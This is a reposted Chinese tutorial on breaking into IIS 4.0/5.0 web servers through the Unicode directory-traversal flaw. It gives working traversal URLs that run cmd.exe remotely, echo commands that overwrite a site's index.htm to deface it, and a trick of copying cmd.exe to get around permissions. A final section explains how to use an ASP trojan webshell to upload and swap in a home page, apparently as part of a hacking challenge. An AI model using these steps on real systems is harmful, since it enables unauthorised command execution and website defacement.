熱點推薦:
您现在的位置: 電腦知識網 >> 網絡技術 >> 正文

IIS漏洞入侵

2013-09-12 16:07:29  來源: 網絡技術 
  IIS(Internet Information Server)服務為Web服務器提供了強大的Internet和Intranet服務功能。主要通過端口80來完成操作,因為作為Web服務器,80端口總要打開,具有很大的威脅性。長期以來攻擊IIS服務是黑客慣用的手段,筆者記得有段時間兩大黑客組織對攻就頻繁地用到了IIS漏洞入侵。這種情況現在還依然存在,多是由於企業管理者或網管對安全問題關注不夠造成的。
Unicode漏洞
  針對IIS的攻擊方式可以說是五花八門,使用大量的數據請求,使IIS超負荷而停止工作,是初級黑客的必修課程。不過鑒於篇幅限制,針對IIS的攻擊本文不做詳細介紹,而是說說入侵IIS。IIS有十多種常見漏洞,但利用得最多的莫過於Unicode解析錯誤漏洞。微軟IIS 4.0/5.0在Unicode字符解碼的實現中存在一個安全漏洞,用戶可以遠程通過IIS執行任意命令。當IIS打開文件時,如果該文件名包含Unicode字符,它會對它進行解碼。如果用戶提供一些特殊的編碼,將導致IIS錯誤地打開或者執行某些Web根目錄以外的文件或程序。我們此文就著重來講講如何利用這個漏洞入侵IIS。
  對於IIS 4.0/5.0中文版,當IIS在收到的URL請求的文件名中,包含一個特殊的編碼例如“%c1%hh”或者“%c0%hh”,它會首先將其解碼變成“0xc10xhh”, 然後嘗試打開這個文件。tW.wIngwit.CoMWindows系統認為“0xc10xhh”可能是Unicode編碼,因此它會首先將其解碼,如果 “0x00<= %hh < 0x40”的話,采用的解碼的格式與下面的類似:
  %c1%hh->(0xc1-0xc0)*0x40+0xhh
  %c0%hh->(0xc0-0xc0)*0x40+0xhh
  因此,利用這種編碼,我們可以構造很多字符,例如:
  %c1%1c->(0xc1-0xc0)*0x40+0x1c=0x5c='/'
  %c0%2f->(0xc0-0xc0)*0x40+0x2f=0x2f='\'
  攻擊者可以利用這個漏洞來繞過IIS的路徑檢查,去執行或者打開任意的文件。此漏洞從中文版IIS4.0+SP6開始,還影響中文版WIN2000+IIS5.0、中文版WIN2000+IIS5.0+SP1。
  在NT4中“/”編碼為“%c1%9c”;在英文版的WIN2000中為“%c0%af”;在中文版的WIN2000裡是“%c1%1c”。此外還有多種編碼,不逐一闡述,大家可以查查資料。本文均以WIN2000為例,其他類型請自行替換。
判斷是否存在漏洞
  用該漏洞的掃描器來進行掃描是一種常見的方法。但我們知道,掃描並不是一個真正的黑客攻擊行為,它只是一種尋找入口的方式。IIS的Unicode漏洞掃描器有很多,如RangeScan或者是unicodeScan都可以進行掃描以收集服務器信息。還有些綜合性的掃描軟件除了能發現Unicode漏洞之外,同時還能收集服務器的其它漏洞——X-Scan(下載地址:http://bitscn.com/upload/X-Scan-v3.1-cn.rar)。
  當然也可以在IE浏覽器中輸入以下語句來進行判斷:
  http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
  學過DOS的應該可以看懂,其實就是利用當中的非法請求使我們連到system32下,如果Inetpub目錄不和Winnt在同一盤符,或者目錄級數有改動,就可能會引起請求失敗。
  如果存在漏洞,那麼在浏覽區可看到如下類似信息:
  Directory of C:\inetpub\scripts
  2005-03-05 15:49 〈DIR〉 .
  2005-09-05 15:49 〈DIR〉 ..
  是不是有自己機器的感覺了,正點!要的就是這種感覺!
  cmd.exe相當於DOS裡的command.com,因此,我們可以執行很多命令了!
  注意:在上面輸入的判斷語句中,“/c”後面的“+”,實際上是空格,請記牢!dir是DOS中的查看文件和目錄命令,不懂DOS的朋友快去學習。
  看了上面的介紹,不用說大家也知道我們可以利用此漏洞對服務器展開攻擊了!
修改網站首頁
1.確定網站首頁名稱
  一般網站默認首頁文件為index.htm、index.html、index.asp、default.htm、defautl.html或default.asp中的一個,我們可以通過輸入不同的首頁名稱來測試並確定要修改的網站首頁。在IE地址欄中輸入以下三個網址:
  http://aa.feedom.net/index.html
  http://aa.feedom.net/default.asp
  http://aa.feedom.net/index.htm
  通過對上面三個網址的測試,我們發現只有第三個網址可以正常打開,說明這個網站的首頁名稱為index.htm。好了,那麼我們就修改它吧!
2.修改原理
  最方便的方法是echo法:echo是一個系統命令,主要用於設置回應開關。
  echo test >c:\autoexec.bat就是把test加入autoexec.bat裡並刪除原有內容;
  echo timedate >>c:\autoexec.bat就是加入timedate但不刪除原有內容。
  明白了嗎?接下來我們就可以逍遙地修改了。
3.更改網站首頁
  在IE中輸入以下地址:
  http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+ HaHaThisismyhack +>c:\inetpub\wwwroot\index.htm
  IE浏覽器返回來的結果可能為以下兩種情況之一:
  1)HTTP 500 - 內部服務器錯誤
  2)The parameter is incorrect
  通過返回信息提示和對CMD的分析,可能是命令語句中參數錯誤,加入"符號再試試:
  1) http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+ HaHaThisismyhack +>c:\inetpub\wwwroot\index.htm
  表示把HaHaThisismyhack加入到index.htm文件並刪除原有內容。
  2)http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+ by2005-3-9+>>c:\inetpub\wwwroot\index.htm
  表示把by2005-3-9加入到index.htm文件中,但不刪除原有內容。
  如果正常,上面兩條語句的回應應該都為CGI錯誤,這表示語句執行成功了,系統只是程序性地報個錯誤,不用理會它。
  現在再來打開網站aa.feedom.net看看吧,怎麼樣了,是不是被你改掉了?在實際操作中,由於目錄權限等網管因素的存在,可能這個方法也會失效,這時,我們就可以用copy cmd.exe 為另一個.exe文件的方式解決,不過要記住路徑,別出錯了,例如:
  http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
  c:\inetpub\wwwroot\index.htm">http://aa.feedom.net/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
  本文講到的技術比較簡單,很適合初學者研究和學習。也許你通過本文的實例方式,已經能修改我們提供的服務器首頁了,但是在實際操作中,服務器環境必然有變化,而且障礙也許是你未曾研究或接觸過的。所以只有牢牢地掌握了基礎知識才有進階的資本。大家可以根據文中提到的知識點查閱資料輔助學習。
第一關難點攻略
1.上傳文件始終報錯
  有的朋友通過上一期文章介紹的步驟,利用我們提供的木馬程序,在訪問http://cp.feedom.net/uploadtest/muma.asp頁面,並上傳首頁文件時被堵住了。其實我們在第一關的文章裡提到過這些細節問題,可能有些讀者忽略了。
  ①進入木馬配置頁面後,點擊“Stream”按鈕;
  ②根據文章要求,我們必須在“PATH:”欄裡,將訪問地址改為“D:\www\cp.feedom.net\ct”;
  ③點擊“浏覽”按鈕,選擇一個本地硬盤中的index***.htm文件(***為自定義名稱);
  提示:根據文章中的說明,該木馬程序並不支持文件名重名,由於參與的讀者眾多,index.htm文件早已有人上傳,所以不改文件名將會提示上傳錯誤的。
  ④現在最關鍵的地方來了,在“保存為:”欄裡,必須填寫完整的文件路徑。例如“D:\www\cp.feedom.net\ct\index***.htm”,如果文件名不寫是會報錯的,這是絕大多數參與者易犯的錯誤;
  ⑤現在你只要點“上傳”按鈕即可。
2.不能替換首頁
  有的朋友反映,index***.htm已經成功地上傳了,但是第一關的任務是要將http://ct.feedom.net改為首頁,雖然現在可以通過“http://ct.feedom.net/上傳的文件名”來訪問已上傳的網頁,但並沒有將它改為http://ct.feedom.net的首頁——index.htm呀,顯然只上傳文件是不夠的,還差一步。
  細心的讀者肯定注意到了,“Stream”頁面中,在每一個已上傳的文件後面,都有“Down、Edit、SaveAs”幾個按鈕,你只有點擊“SaveAs”,然後將你上傳的htm文件更名為Index.htm就可以了。雖然我們提到的木馬程序不能覆蓋文件,但可以通過這個方式達到替換首頁的目的。  
From:http://tw.wingwit.com/Article/Network/201309/1046.html
  • 上一篇文章:

  • 下一篇文章:
  • Copyright © 2005-2013 電腦知識網 Computer Knowledge   All rights reserved.